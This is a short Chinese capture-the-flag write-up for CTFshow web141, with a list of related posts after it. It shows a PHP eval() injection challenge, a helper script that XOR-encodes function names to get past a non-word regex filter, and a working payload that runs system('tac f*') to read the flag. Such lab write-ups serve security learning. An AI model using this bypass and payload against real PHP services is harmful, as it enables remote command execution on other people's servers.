CTFshow php特性 web141
目录
- 源码
- 思路
- 题解
- 总结
源码
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-17 19:28:09*/#error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){$v1 = (String)$_GET['v1'];$v2 = (String)$_GET['v2'];$v3 = (String)$_GET['v3'];if(is_numeric($v1) && is_numeric($v2)){if(preg_match('/^\W+$/', $v3)){$code = eval("return $v1$v3$v2;");echo "$v1$v3$v2 = ".$code;}}
}思路
数字和运算符是可以一起执行命令的,如1+phpinfo()+1;是可以显示phpinfo页面的,GET传入的只是字符串“1+phpinfo()+1”;是不能直接执行命令的,经过eval处理后就变成了可以执行命令,if(preg_match('/^\W+$/', $v3)){的存在我们只能传入非数字字母,不过php7可以用(‘phpinfo’)()动态调用函数,可以用异或绕过
题解
异或脚本
<?php
highlight_file(__FILE__);
$a = $_GET['a'];
for ($i = 0; $i < strlen($a); $i++) {echo "%".dechex(ord($a[$i])^0xff);
}
echo "^";
for ($i = 0; $i < strlen($a); $i++) {echo "%ff";
}
?v1=1&v2=1&v3=%2b(%8c%86%8c%8b%9a%92^%ff%ff%ff%ff%ff%ff)(%8b%9e%9c%df%99%d5^%ff%ff%ff%ff%ff%ff)%2b
总结
水题
CTFshow php特性 web141相关推荐
- ctfshow php特性 下
目录 web113 web114 web115 web123(php解析特性) web125 web126 web127(php解析特性) web128 web129 web130 web131 we ...
- ctfshow php特性(89——150plus)
web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num ...
- ctfshow php特性 web89-web115 web123-150wp
php特性 参考博客仍然是南神博客 文章目录 php特性 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web10 ...
- CTFshow——PHP特性(下)
目录: web132--逻辑运算符的优先级 web133--curl -F web134--php变量覆盖 web135-- >xx.txt 写文件 web136-- tee命令 web137- ...
- CTFshow php特性 web150plus
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web150
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web147
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web140
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web138
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
最新文章
- 【数据结构】双链表的实现(C语言)
- Retrofit 上传文件显示进度及踩坑记录
- Zabbix 3.2.6 升级到 Zabbix 3.4.3
- Scala比较器:Ordered与Ordering
- LeetCode之Hamming Distance
- 人工智能与物联网安全:以子之矛,攻子之盾
- javascript的table 对象 属性 方法
- matplotlib中文乱码的两种解决方案
- keil注册机激活的方法
- python opencv车辆测速视频汽车速度检测入侵检测测速
- js:常用的3种弹出提示框(alert、confirm、prompt)
- iOS8官方推荐图标和图像尺寸
- PHP手册翻译日记[1]
- Unveiling the java.lang.Out OfMemoryError
- 一步步自定义视频播放器——TextureView+MediaPlayer自定义视频播放器
- iOS开发笔记(IOS7回归)
- 扫描仪怎样装无线网络服务器,扫描仪(7140)安装说明
- 综合素质计算机的知识考点,综合素质常识考题
- logging日志写入文件
- Windows安装TensorFlow教程(国内源安装附上各大镜像网站网址)